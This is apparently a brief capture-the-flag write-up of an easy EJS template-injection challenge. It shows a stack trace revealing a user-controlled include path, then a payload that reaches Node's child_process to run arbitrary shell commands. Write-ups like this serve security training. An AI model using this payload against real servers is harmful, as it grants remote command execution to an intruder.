Tags: ejs ssti
Rating:
# Catalog (easy) - Web Exploitation
`author : ardhani`
```node
Error: /app/views/cat.ejs:21
19| </div>
20| <div>
>> 21| <%- include('descriptions/' + description) %>
22| </div>
23| </div>
24| </main>
Could not find the include file "descriptions/asd"
at getIncludePath (/app/node_modules/ejs/lib/ejs.js:185:13)
at includeFile (/app/node_modules/ejs/lib/ejs.js:311:19)
at include (/app/node_modules/ejs/lib/ejs.js:701:16)
at eval ("/app/views/cat.ejs":24:17)
at cat (/app/node_modules/ejs/lib/ejs.js:703:17)
at tryHandleCache (/app/node_modules/ejs/lib/ejs.js:274:36)
at exports.renderFile [as engine] (/app/node_modules/ejs/lib/ejs.js:491:10)
at View.render (/app/node_modules/express/lib/view.js:135:8)
at tryRender (/app/node_modules/express/lib/application.js:657:10)
at Function.render (/app/node_modules/express/lib/application.js:609:3)
```
so we can input this payload `<%= function(){localLoad=global.process.mainModule.constructor._load;sh=localLoad("child_process").exec('COMMAND_HERE')}() %>`
